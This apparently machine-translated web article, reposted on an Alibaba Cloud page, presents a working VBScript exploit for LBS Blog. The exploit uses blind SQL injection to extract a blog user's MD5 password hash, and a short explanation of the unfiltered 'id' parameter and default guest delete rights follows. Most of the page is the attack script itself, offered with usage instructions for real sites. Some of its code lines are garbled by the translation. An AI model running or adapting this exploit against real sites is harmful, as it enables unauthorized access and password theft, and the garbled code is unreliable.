Home > Others

LBS Blog SQL injection Vulnerability [All version]-official has patched _javascript tips

Source: Internet
Author: User
Tags md5 sql injection
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >
Oh, just to prove that the loophole exists
Exp follows, save as VBS, test yourself Next program

' From the heart of the sword
'============================================================================
' Use instructions:
' At a command prompt:
' Cscript.exe Lbsblog.vbs to attack the site's blog path valid article ID to crack the blog user password
As
' Cscript.exe lbsblog.vbs WWW.XXXX.COM/BLOG/1 1
' By Loveshell
'============================================================================
On Error Resume Next
Dim Oargs
Dim olbsxml ' XMLHTTP object is used to open the destination URL
Dim targeturl ' Destination URL
Dim Userid,articleid ' blog username
Dim TempStr ' holds the acquired partial MD5 password
Dim Charhex ' defines 16 characters
Dim CharSet

Set Oargs = wscript.arguments
If Oargs.count < 1 Then call Showusage ()


Set Olbsxml = CreateObject ("Microsoft.XMLHTTP")

' Add full target URL
TargetUrl = Oargs (0)
If LCase (Left (targeturl,7)) <> "http://" Then targeturl = "http://" & TargetUrl
If Right (targeturl,1) <> "/" Then TargetUrl = targeturl & "/"
Targeturl=targeturl & "Article.asp"

Articleid=oargs (1)
Userid=oargs (2)
Tempstr= ""
Charhex=split ("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f", ",")


WScript.Echo "LBS Blog All version exploit" &vbcrlf
WScript.Echo "By The Sword Heart" &vbcrlf
WScript.Echo "Http://www.loveshell.net/Just for fun:)" &vbcrlf&vbcrlf
WScript.Echo "+fuck The site Now" &vbcrlf

Call Main (Targeturl,blogname)

Set Obokexml = Nothing


'----------------------------------------------Sub-------------------------------------------------------
'============================================
' Function name: main
' Function function: Main program, inject get blog user password
'============================================
Sub Main (Targeturl,blogname)
Dim Mainoffset,suboffset,templen,openurl,getpage
For mainoffset = 1 to 40
For suboffset = 0 to 15
Templen = 0
PostData = ""
PostData = ArticleID & "and" (select Left (User_password, "&MainOffset&") from Blog_user where user_id= "& US Erid & ") = '" & Tempstr&charhex (Suboffset) & ""

OpenURL = TargetUrl

Olbsxml.open "Post", OpenURL, False, "", ""
Olbsxml.setrequestheader "Content-type", "application/x-www-form-urlencoded"
Olbsxml.send "Act=delete&id=" & Escape (PostData)
GetPage = Bytestobstr (olbsxml.responsebody)
' Determine if the page you are visiting exists
If InStr (GetPage, "deleted") <>0 Then
"Blog users do not exist or fill in the wrong information" as the error flag, return to this sign that the MD5 is not correct guess solution
' If you get the MD5 value of 0000000000000000, please modify the error flag
ElseIf InStr (getpage, "permission") <>0 Then
Tempstr=tempstr & Charhex (Suboffset)
WScript.Echo "+crack Now:" &tempstr
Exit for
Else
WScript.Echo vbCrLf & "Something Error" & vbCrLf
WScript.Echo vbCrLf & getpage& vbCrLf
Wscript.Quit
End If
Next
Next
WScript.Echo vbcrlf& "+we Got It:" & TempStr & vbCrLf &vbcrlf& ":P Don t be evil"
End Sub

'============================================
' Function name: bytestobstr
' function function: Converts the contents of a XMLHTTP object into a GB2312 encoding
'============================================
Function Bytestobstr (body)
Dim objstream
Set objstream = CreateObject ("ADODB. Stream ")
Objstream. Type = 1
Objstream. Mode =3
Objstream. Open
Objstream. Write body
Objstream. Position = 0
Objstream. Type = 2
Objstream. Charset = "GB2312"
Bytestobstr = objstream. ReadText
Objstream. Close
Set objstream = Nothing
End Function

'============================
' Function name: showusage
' Function function: Using method hints
'============================
Sub Showusage ()
WScript.Echo "LBS Blog Exploit" & vbCrLf & "by loveshell/Jian Xin"
WScript.Echo "Usage:" & vbCrLf & "CScript" & Wscript.scriptfullname & "TargetUrl blogname"
WScript.Echo "Example:" & vbCrLf & "CScript" & Wscript.scriptfullname & "HTTP://WWW.LOVESHELL.NET/1 1"
WScript.Echo ""
Wscript.Quit
End Sub



Vulnerability Description:

In the src_article.asp
......
input["log_id"]=func.checkint (input["log_id");
if (!input["id"]) {
strerror=lang["Invalid_parameter"];
}else{
Check if the article exists
Thearticle.load ("log_id, Log_authorid, Log_catid", "log_id=" +input["id"]);
Strerror=false;
}
......


The filter is log_id, but use the exact ID, hehe:)

And then what?
Code in the Class/article.asp
This.load = function (Strselect, strwhere) {
var tmpa=connblog.query ("Select top 1" +strselect+ "from [Blog_article] where" +strwhere);
if (Tmpa) {
This.fill (Tmpa[0]);
return true;
}else{
return false;
}
}


It goes without saying, hehe. But the trigger to the condition, see can meet not Oh!

function Articledelete () {
if (theuser.rights["Delete"]<1) {
Check User right-without DB Query
PageHeader (lang["error"]);
Redirectmessage (lang["error"], lang["No_rights"], lang["GoBack"], "javascript:window.history.back ();", False, " Errorbox ");
}else{
var thearticle=new lbsarticle ();
var strerror;



By default, Guest has permission to delete, although the following also made a judgment, but the injection has occurred, and we just use his judgment injection, hehe

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
sql injection vulnerability scanner sql injection select all how to fix sql injection vulnerability test website for sql injection vulnerability union all select sql injection sql injection show all tables sql injection drop all tables

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More